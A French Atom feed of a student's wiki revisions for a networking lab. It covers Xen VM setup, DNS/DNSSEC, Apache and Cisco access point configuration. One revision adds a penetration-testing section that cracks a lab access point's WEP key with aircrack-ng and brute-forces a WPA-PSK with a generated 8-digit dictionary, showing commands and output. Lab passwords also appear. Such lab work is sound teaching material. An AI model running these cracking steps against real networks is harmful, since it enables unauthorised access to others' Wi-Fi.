<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Yhaloua1</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Yhaloua1"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Yhaloua1"/>
		<updated>2026-04-24T15:55:43Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56540</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56540"/>
				<updated>2021-11-29T10:51:13Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Sécurisation du serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Lancer les commandes &lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Il faut à présent sécuriser le serveur DNS en signant la zone correspondant à mon nom de domaine.&lt;br /&gt;
&lt;br /&gt;
- Dé-commenter la ligne suivante dans le fichier '''named.conf.options''' :&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
- Créer un repertoire '''toad59.space.dnssec''' pour y génerer des clefs :&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de signature de clefs de zone'''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de zone pour les enregistrements '''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
- Renommer les clefs :&lt;br /&gt;
 mv Ktoad59.site.+005+26968.key toad59.site-ksk.key&lt;br /&gt;
 mv Ktoad59.site.+005+26968.private toad59.site-ksk.private&lt;br /&gt;
 mv Ktoad59.site.+005+27570.key toad59.site-zsk.key&lt;br /&gt;
 mv Ktoad59.site.+005+27570.private toad59.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
- Inclure les clefs publiques dans dans le fichier db.toad59.site&lt;br /&gt;
 $include /etc/bind/toad59.site.dnssec/toad59.site-ksk.key&lt;br /&gt;
 $include /etc/bind/toad59.site.dnssec/toad59.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
- Signer les enregistrements à partir du répertoire '''toad59.space.dnssec'''&lt;br /&gt;
 dnssec-signzone -o toad59.site -k toad59.site-ksk  ../db.toad59.site toad59.site-zsk&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''named.conf.local''' pour utiliser '''db.toad59.site.signed'''&lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;etc/bind/db.toad59.site.signed&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Installation Apache ====&lt;br /&gt;
&lt;br /&gt;
Installer apache :&lt;br /&gt;
 apt-get install apache2&lt;br /&gt;
&lt;br /&gt;
L'accès en local à la VM est à présent fonctionnel. Pour cela, il faut taper l'adresse IP de la VM sur navigateur web.&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56528</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56528"/>
				<updated>2021-11-29T08:50:22Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Sécurisation du serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Lancer les commandes &lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Il faut à présent sécuriser le serveur DNS en signant la zone correspondant à mon nom de domaine.&lt;br /&gt;
&lt;br /&gt;
- Dé-commenter la ligne suivante dans le fichier '''named.conf.options''' :&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
- Créer un repertoire '''toad59.space.dnssec''' pour y génerer des clefs :&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de signature de clefs de zone'''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de zone pour les enregistrements '''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
